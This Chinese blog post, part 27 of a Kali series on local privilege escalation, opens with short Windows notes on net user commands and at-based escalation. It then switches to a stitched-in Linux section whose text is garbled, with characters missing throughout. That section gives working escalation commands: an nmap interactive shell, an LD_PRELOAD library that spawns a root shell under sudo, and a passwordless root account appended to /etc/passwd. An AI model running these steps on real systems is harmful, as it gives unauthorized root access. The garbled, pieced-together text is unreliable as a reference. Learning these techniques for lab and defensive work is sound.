【kali】27 提权——本地提权

windows:

  • user
  • administrator
  • system ——内核
    在这里插入图片描述

Linux:

  • user
  • root

Windows系统提权

1. 使用at提权

XP
Windows server 2003

修改密码

net user 

查看系统用户

net user xxx *

在这里插入图片描述

查看用户状态

net user xxx

在这里插入图片描述

Kali Linux 系统中进行操作通常涉及利用系统漏洞、配置错误或弱限设置来获取更高的限(如从普通用户升到 root)。以下是一些常见的命令和技术,适用于不同的场景: ### 3.1 使用 `sudo` 如果用户拥有 `sudo` 限,可以通过以下命令获取 root 限: ```bash sudo su ``` 或者直接执行需要 root 限的命令: ```bash sudo <command> ``` ### 3.2 检查可用的 SUID 二进制文件 SUID(Set Owner User ID)位允许用户以文件所有者的限运行程序。可以通过以下命令查找具有 SUID 限的文件: ```bash find / -type f -perm -u=s 2>/dev/null ``` 如果发现可利用的 SUID 二进制文件(如 `nmap`、`vim` 等),可以尝试利用其功能进行。例如使用 `nmap` 的交互模式: ```bash nmap --interactive !sh ``` ### 3.3 利用内核漏洞 某些内核版本存在漏洞,可以使用如 `Dirty COW`(CVE-2016-5195)等漏洞进行。首先检查当前内核版本: ```bash uname -a ``` 如果发现存在已知漏洞的内核版本,可以下载对应的漏洞利用脚本并执行。 ### 3.4 利用服务漏洞 一些服务(如 `cron`、`systemd`、`polkit` 等)配置不当可能导致。例如,检查定时任务: ```bash crontab -l ``` 如果发现可写路径或可修改的任务脚本,可以注入恶意代码以 root 限执行。 ### 3.5 使用检查工具 Kali Linux 供了一些自动化检查工具,如 `LinEnum` 和 `linux-exploit-suggester.sh`: ```bash git clone https://github.com/rebootuser/LinEnum.git cd LinEnum ./LinEnum.sh ``` 该脚本会自动检查系统中可能存在的路径和漏洞[^1]。 ### 3.6 利用环境变量 某些程序在调用时会使用不安全的环境变量,例如 `LD_PRELOAD`。如果程序未正确清理环境变量,可以尝试注入恶意库: ```bash echo 'int main() { setuid(0); system("/bin/sh"); return 0; }' > /tmp/evil.c gcc -fPIC -shared -o /tmp/evil.so /tmp/evil.c sudo LD_PRELOAD=/tmp/evil.so <vulnerable_program> ``` ### 3.7 检查可写入的系统文件 查找系统中可写入的关键文件,如 `/etc/passwd` 或 `/etc/sudoers`: ```bash ls -l /etc/passwd ``` 如果发现 `/etc/passwd` 可写,可以添加一个新用户并赋予 root 限: ```bash echo 'root2::0:0:root:/root:/bin/bash' >> /etc/passwd su root2 ``` ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值